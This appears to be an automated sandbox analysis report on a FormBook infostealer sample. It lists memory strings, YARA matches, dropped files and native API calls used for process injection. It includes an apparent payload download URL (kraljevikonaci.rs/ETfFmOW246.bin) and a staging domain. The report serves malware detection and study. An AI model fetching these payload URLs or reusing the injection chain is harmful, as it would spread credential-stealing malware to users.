73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.n-benriya002.com
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.n-benriya002.com/9pdo/
Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170479484.0000000004456000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin
Source: Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin5?
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.binY
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bins
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cmd.exe, 0000000E.00000003.2349353225.0000000007982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004054B6

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Overfondle.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_204A2C70
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_204A2DF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A35C0 NtCreateMutant,LdrInitializeThunk, 8_2_204A35C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A4340 NtSetContextThread, 8_2_204A4340
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A4650 NtSuspendThread, 8_2_204A4650
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AD0 NtReadFile, 8_2_204A2AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AF0 NtWriteFile, 8_2_204A2AF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AB0 NtWaitForSingleObject, 8_2_204A2AB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2B60 NtClose, 8_2_204A2B60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BE0 NtQueryValueKey, 8_2_204A2BE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BF0 NtAllocateVirtualMemory, 8_2_204A2BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2B80 NtQueryInformationFile, 8_2_204A2B80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BA0 NtEnumerateValueKey, 8_2_204A2BA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C60 NtCreateKey, 8_2_204A2C60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C00 NtQueryInformationProcess, 8_2_204A2C00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CC0 NtQueryVirtualMemory, 8_2_204A2CC0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CF0 NtOpenProcess, 8_2_204A2CF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CA0 NtQueryInformationToken, 8_2_204A2CA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D00 NtSetInformationFile, 8_2_204A2D00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D10 NtMapViewOfSection, 8_2_204A2D10
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D30 NtUnmapViewOfSection, 8_2_204A2D30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DD0 NtDelayExecution, 8_2_204A2DD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DB0 NtEnumerateKey, 8_2_204A2DB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2E30 NtWriteVirtualMemory, 8_2_204A2E30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2EE0 NtQueueApcThread, 8_2_204A2EE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2E80 NtReadVirtualMemory, 8_2_204A2E80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2EA0 NtAdjustPrivilegesToken, 8_2_204A2EA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F60 NtCreateProcessEx, 8_2_204A2F60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F30 NtCreateSection, 8_2_204A2F30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FE0 NtCreateFile, 8_2_204A2FE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2F90 NtProtectVirtualMemory, 8_2_204A2F90
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FA0 NtQuerySection, 8_2_204A2FA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2FB0 NtResumeThread, 8_2_204A2FB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A3010 NtOpenDirectoryObject, 8_2_204A3010
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A3090 NtSetValueKey, 8_2_204A3090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A4340 NtSetContextThread,LdrInitializeThunk, 14_2_031A4340
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A4650 NtSuspendThread,LdrInitializeThunk, 14_2_031A4650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2B60 NtClose,LdrInitializeThunk, 14_2_031A2B60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AD0 NtReadFile,LdrInitializeThunk, 14_2_031A2AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AF0 NtWriteFile,LdrInitializeThunk, 14_2_031A2AF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F30 NtCreateSection,LdrInitializeThunk, 14_2_031A2F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FB0 NtResumeThread,LdrInitializeThunk, 14_2_031A2FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FE0 NtCreateFile,LdrInitializeThunk, 14_2_031A2FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2EE0 NtQueueApcThread,LdrInitializeThunk, 14_2_031A2EE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D10 NtMapViewOfSection,LdrInitializeThunk, 14_2_031A2D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_031A2D30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DD0 NtDelayExecution,LdrInitializeThunk, 14_2_031A2DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_031A2DF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_031A2C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C60 NtCreateKey,LdrInitializeThunk, 14_2_031A2C60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CA0 NtQueryInformationToken,LdrInitializeThunk, 14_2_031A2CA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A35C0 NtCreateMutant,LdrInitializeThunk, 14_2_031A35C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A39B0 NtGetContextThread,LdrInitializeThunk, 14_2_031A39B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2B80 NtQueryInformationFile, 14_2_031A2B80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BA0 NtEnumerateValueKey, 14_2_031A2BA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BF0 NtAllocateVirtualMemory, 14_2_031A2BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2BE0 NtQueryValueKey, 14_2_031A2BE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2AB0 NtWaitForSingleObject, 14_2_031A2AB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F60 NtCreateProcessEx, 14_2_031A2F60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2F90 NtProtectVirtualMemory, 14_2_031A2F90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2FA0 NtQuerySection, 14_2_031A2FA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2E30 NtWriteVirtualMemory, 14_2_031A2E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2E80 NtReadVirtualMemory, 14_2_031A2E80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2EA0 NtAdjustPrivilegesToken, 14_2_031A2EA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2D00 NtSetInformationFile, 14_2_031A2D00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2DB0 NtEnumerateKey, 14_2_031A2DB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2C00 NtQueryInformationProcess, 14_2_031A2C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CC0 NtQueryVirtualMemory, 14_2_031A2CC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A2CF0 NtOpenProcess, 14_2_031A2CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3010 NtOpenDirectoryObject, 14_2_031A3010
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3090 NtSetValueKey, 14_2_031A3090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3D10 NtOpenProcessToken, 14_2_031A3D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A3D70 NtOpenThread, 14_2_031A3D70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7730 NtCreateFile, 14_2_003E7730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7890 NtReadFile, 14_2_003E7890
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7970 NtDeleteFile, 14_2_003E7970
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E7A10 NtClose, 14_2_003E7A10
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3
Creates files inside the system directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Windows\SysWOW64\psiloses.lnk Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_0040727F 0_2_0040727F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00406AA8 0_2_00406AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_033DF108 2_2_033DF108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_033DF9D8 2_2_033DF9D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_033DEDC0 2_2_033DEDC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07968970 2_2_07968970
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F8158 8_2_204F8158
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460100 8_2_20460100
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205281CC 8_2_205281CC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205241A2 8_2_205241A2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205301AA 8_2_205301AA
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F02C0 8_2_204F02C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052A352 8_2_2052A352
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205303E6 8_2_205303E6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E3F0 8_2_2047E3F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20522446 8_2_20522446
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20514420 8_2_20514420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051E4F6 8_2_2051E4F6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20530591 8_2_20530591
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048C6E0 8_2_2048C6E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20494750 8_2_20494750
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046C7C0 8_2_2046C7C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047A840 8_2_2047A840
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20472840 8_2_20472840
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E8F0 8_2_2049E8F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204568B8 8_2_204568B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20486962 8_2_20486962
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053A9A6 8_2_2053A9A6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052AB40 8_2_2052AB40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20526BD7 8_2_20526BD7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470C00 8_2_20470C00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460CF2 8_2_20460CF2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510CB5 8_2_20510CB5
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047AD00 8_2_2047AD00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050CD1F 8_2_2050CD1F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046ADE0 8_2_2046ADE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20488DBF 8_2_20488DBF
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470E59 8_2_20470E59
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052EE26 8_2_2052EE26
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052EEDB 8_2_2052EEDB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052CE93 8_2_2052CE93
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482E90 8_2_20482E90
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E4F40 8_2_204E4F40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20512F30 8_2_20512F30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B2F28 8_2_204B2F28
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20490F30 8_2_20490F30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20462FC8 8_2_20462FC8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047CFE0 8_2_2047CFE0
